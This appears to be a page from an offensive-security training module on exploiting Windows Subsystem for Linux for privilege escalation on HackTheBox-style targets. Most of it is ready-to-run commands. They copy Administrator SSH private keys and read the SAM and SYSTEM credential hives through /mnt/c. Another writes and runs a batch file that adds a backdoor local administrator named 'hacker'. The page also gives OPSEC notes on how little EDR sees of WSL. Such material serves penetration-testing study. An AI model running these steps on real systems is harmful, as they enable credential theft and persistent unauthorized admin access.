Back to All Modules

Windows Subsystem for Linux (WSL) Exploitation

#Overview

Windows Subsystem for Linux (WSL) allows running Linux binaries natively on Windows. If WSL is installed on a target, it can provide an escape route to root or a way to access Windows files with elevated privileges, since the default WSL distribution runs as root by default.

#Prerequisites

  • WSL installed on the target Windows system
  • Ability to execute commands (even as low-privilege user)

#Detection & Enumeration

:: Check if WSL is installed
wsl --list
wsl -l -v

:: Check WSL version (1 or 2)
wsl --status

:: List installed distributions
wsl --list --verbose

:: Check if wsl.exe is available
where wsl.exe
CMD
# PowerShell check for WSL
Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
POWERSHELL

#Exploitation / Execution

#WSL Root Access (No Password Required)

:: WSL defaults to root user — no password needed
wsl

:: Inside WSL, you're root by default
whoami
# root

:: Access the Windows filesystem from WSL
ls /mnt/c/
cat /mnt/c/Users/Administrator/Desktop/flag.txt

:: Copy files from Windows to Linux (or vice versa)
cp /mnt/c/Users/Administrator/.ssh/id_rsa /tmp/id_rsa
CMD

#Reading Protected Windows Files via WSL

# Inside WSL as root, bypass Windows ACLs
cat /mnt/c/Windows/System32/config/SAM
cat /mnt/c/Windows/System32/config/SYSTEM

# Read files in other users' directories
ls /mnt/c/Users/*/Desktop/
cat /mnt/c/Users/Administrator/Desktop/secrets.txt

# Access SSH keys
find /mnt/c/Users/ -name "id_rsa" 2>/dev/null
find /mnt/c/Users/ -name ".ssh" -type d 2>/dev/null
BASH

#Creating Backdoor User via WSL

:: Add a local admin user from WSL
wsl -e bash -c "echo 'cmd.exe /c net user hacker P@ssw0rd! /add && net localgroup Administrators hacker /add' > /mnt/c/temp/adduser.bat"
wsl -e cmd.exe /c C:\temp\adduser.bat
CMD

#WSL2 Specific Considerations

  • WSL2 uses a lightweight VM — the Linux kernel runs in a Hyper-V container
  • Network access from WSL2 goes through a virtual NIC (usually 172.x.x.x)
  • The /mnt/c/ mount uses the 9P protocol filesystem, which respects most Windows ACLs
  • WSL1 translates Linux syscalls directly to Windows — filesystem performance is slower but ACL bypass may work differently

#Common Pitfalls

  • ⚠️ WSL may not be installed on the target — always check before attempting
  • ⚠️ In WSL2, the filesystem mount respects Windows ACLs more strictly than WSL1
  • ⚠️ wsl.exe requires a desktop session or proper console — it may not work from some shell types
  • ⚠️ WSL distributions can be in "Stopped" state — use wsl -d <distro> to start a specific one
  • ⚠️ Some EDR products now monitor wsl.exe execution

#OPSEC Considerations

  • 🛡️ WSL command execution is logged in Windows Event Log if script block logging is enabled
  • 🛡️ wsl.exe process creation generates Event ID 4688
  • 🛡️ File access via /mnt/c/ is visible to Windows file auditing
  • 🛡️ WSL is less monitored than native Windows execution — many EDR products have limited visibility into WSL activity

#Post-Exploitation Value

WSL provides a straightforward path to read Windows files as root, bypassing Windows ACL restrictions. The most common use case is extracting SSH private keys, configuration files with credentials, or reading the SAM/SYSTEM hives for offline credential extraction.

#Tool References

ToolLink
WSLBuilt-in Windows feature

#Source Machines

  • Occasionally appears in HTB machines with WSL installed
  • Common in enterprise environments where developers use WSL